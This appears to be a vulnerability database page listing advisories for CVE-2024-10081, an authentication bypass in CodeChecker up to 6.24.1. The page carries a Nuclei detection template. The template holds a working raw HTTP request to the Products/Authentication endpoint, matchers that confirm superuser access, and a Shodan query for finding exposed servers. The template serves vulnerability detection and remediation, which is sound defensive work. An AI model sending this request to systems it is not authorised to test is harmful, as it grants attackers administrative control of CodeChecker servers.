| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2024-10081 | 6 Nov 202414:35 | – | circl | |
| CodeChecker 安全漏洞 | 6 Nov 202400:00 | – | cnnvd | |
| CVE-2024-10081 | 6 Nov 202414:33 | – | cve | |
| CVE-2024-10081 | 6 Nov 202414:33 | – | cvelist | |
| codechecker vulnerable to authentication bypass when using specifically crafted URLs | 6 Nov 202415:57 | – | github | |
| CVE-2024-10081 | 6 Nov 202415:15 | – | nvd | |
| CVE-2024-10081 | 6 Nov 202414:33 | – | osv | |
| GHSA-F3F8-VX3W-HP5Q codechecker vulnerable to authentication bypass when using specifically crafted URLs | 6 Nov 202415:57 | – | osv | |
| PYSEC-2024-238 | 6 Nov 202415:15 | – | osv | |
| PT-2024-16015 | 6 Nov 202400:00 | – | ptsecurity |
id: CVE-2024-10081
info:
name: CodeChecker <= 6.24.1 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
impact: |
Unauthenticated attackers can bypass authentication by crafting API URLs ending with specific keywords, gaining superuser access to all API endpoints including product management and configuration.
remediation: |
Upgrade CodeChecker to version 6.24.2 or later.
reference:
- https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
- https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
- https://nvd.nist.gov/vuln/detail/CVE-2024-10081
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 10
cve-id: CVE-2024-10081
cwe-id: CWE-288
epss-score: 0.40058
epss-percentile: 0.98455
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1496590341
tags: cve,cve2024,code-checker,auth-bypass,vkev,vuln
http:
- raw:
- |
POST /v6.58/Products/Authentication HTTP/1.1
Host: {{Hostname}}
[1,"getProducts",1,1,{}]
matchers:
- type: dsl
dsl:
- 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
- "!contains(body,'Error code 401: Unauthorized')"
- "contains(header,'application/x-thrift')"
condition: and
# digest: 490a00463044022007491368554d588f733a28257cb28f2b0ab1a527cca0b60d2db35f2f8c7f2ced02203b9633c288313600e3624afaa39f46bf4369fce66bbd48a3f8041e750e36cee8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation